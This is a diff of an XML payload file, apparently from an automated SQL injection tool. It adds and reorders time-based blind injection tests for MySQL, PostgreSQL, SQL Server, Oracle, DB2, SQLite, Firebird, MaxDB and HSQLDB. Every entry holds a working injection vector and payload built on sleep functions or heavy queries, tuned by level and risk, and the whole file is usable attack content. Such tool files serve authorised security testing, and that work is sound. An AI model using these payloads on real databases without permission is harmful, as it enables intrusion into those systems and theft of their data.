+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
         <stype>5</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -43,10 +63,31 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 AND time-based blind</title>
         <stype>5</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -63,6 +104,26 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 AND time-based blind (comment)</title>
         <stype>5</stype>
@@ -84,6 +145,27 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -103,6 +185,25 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -123,6 +224,26 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
         <stype>5</stype>
@@ -143,10 +264,30 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>
         <stype>5</stype>
-        <level>5</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -164,10 +305,31 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL &gt; 8.1 OR time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL AND time-based blind (heavy query)</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -183,6 +345,25 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -203,6 +384,26 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase time-based blind</title>
         <stype>5</stype>
@@ -211,6 +412,27 @@
         <clause>0</clause>
         <where>1</where>
         <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
         <request>
             <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
             <comment>--</comment>
@@ -246,6 +468,27 @@
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -268,6 +511,28 @@
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
     <test>
         <title>Oracle AND time-based blind</title>
         <stype>5</stype>
@@ -287,10 +552,29 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle OR time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle AND time-based blind (comment)</title>
         <stype>5</stype>
-        <level>5</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -307,6 +591,26 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle OR time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -326,6 +630,25 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Oracle AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -346,6 +669,104 @@
         </details>
     </test>
 
+    <test>
+        <title>Oracle OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
     <test>
         <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -366,6 +787,26 @@
         </details>
     </test>
 
+    <test>
+        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -387,6 +828,27 @@
         </details>
     </test>
 
+    <test>
+        <title>SQLite &gt; 2.0 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>Firebird AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -407,6 +869,26 @@
         </details>
     </test>
 
+    <test>
+        <title>Firebird OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>Firebird AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -428,10 +910,31 @@
         </details>
     </test>
 
+    <test>
+        <title>Firebird OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>SAP MaxDB AND time-based blind (heavy query)</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -447,6 +950,25 @@
         </details>
     </test>
 
+    <test>
+        <title>SAP MaxDB OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
     <test>
         <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -468,44 +990,25 @@
     </test>
 
     <test>
-        <title>IBM DB2 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
+        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
         <stype>5</stype>
         <level>5</level>
-        <risk>2</risk>
+        <risk>3</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
         <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
             <comment>--</comment>
         </request>
         <response>
             <time>[DELAYED]</time>
         </response>
         <details>
-            <dbms>IBM DB2</dbms>
+            <dbms>SAP MaxDB</dbms>
         </details>
     </test>
-    
+
     <test>
         <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -526,6 +1029,26 @@
         </details>
     </test>
 
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -546,7 +1069,28 @@
             <dbms_version>&gt;= 1.7.2</dbms_version>
         </details>
     </test>
-    
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -567,6 +1111,26 @@
         </details>
     </test>
 
+    <test>
+        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
@@ -587,332 +1151,12 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of AND time-based blind tests -->
-
-    <!-- OR time-based blind tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
